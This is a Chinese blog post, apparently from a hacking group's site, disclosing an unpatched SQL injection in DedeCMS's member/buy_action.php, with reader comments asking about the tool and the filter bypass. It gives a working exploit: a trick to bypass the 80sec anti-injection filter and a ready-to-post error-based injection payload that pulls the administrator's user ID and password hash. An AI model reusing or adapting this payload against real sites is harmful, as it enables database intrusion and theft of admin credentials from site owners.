DEDECMS最新注入一枚

Blog:https://phpinfo.me
 F4ck Team 
 #######################

今天无聊逛乌云发现有人提交了个漏洞,不知道和我的是不是一样的,没公开看不了

去官网看了下还没出补丁  更新时间:2013年9月12日

于是我下载了DEDECMS到本地来看看

1

在member\buy_action.php中存在注入

sb

Sql经过ExecuteNoneQuery函数,于是跟踪ExecuteNoneQuery函数

3

发现sql经过CheckSql函数

于是找CheckSql函数

80sec

原来是80SEC的防注入  这个已经被大牛绕过了  直接char(@`’`)就可以过了 

于是构造注入语句!

INSERT INTO #@__member_operation(`buyid` , `pname` , `product` , `money`
, `mtime` , `pid` , `mid` , `sta` ,`oldinfo`)
   VALUES (‘M2T1389683145RN868’, ”, ‘1111’ and char(@`’`) and (SELECT
1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select
(concat(0xC3DCC2EB,userid,0x3a,pwd)) from `#@__admin` limit
0,1),1,62)))a from information_schema.tables group by a)b))#’ , ” ,
‘1389683145’ , ‘1’ , ‘2’ , ‘0’ , ”);

然后注册会员后

直接post http://127.0.0.1/dede/member/buy_action.php这个文件

exp:

product=abc’ and char(@`’`) and (SELECT 1 FROM (select count(*),concat(floor(rand(0)*2),(substring((Select (concat(0xC3DCC2EB,userid,0x3a,pwd)) from `#@__admin` limit 0,1),1,62)))a from information_schema.tables group by a)b))#

pass

成功注入!但是受gpc影响,只有gpc=Off时才能注入..

文 / admin
4 COMMENTS
  1. 头像
    2014/01/14
    小小
    回复

    呵呵 大哥 你最后一步的工具是什么工具呢

    • admin
      2014/01/15
      admin
      回复
      @小小 hackbar
  2. 头像
    2014/01/15
    牛牛
    回复

    请教下大哥 char(@`’`) 是什么意思?不明白这里绕过80sec的原理

  3. 头像
    2014/09/23
    ade
    回复

    如果修改才能不绕过呢?要加什么条件或判断?

LEAVE A REPLY

loading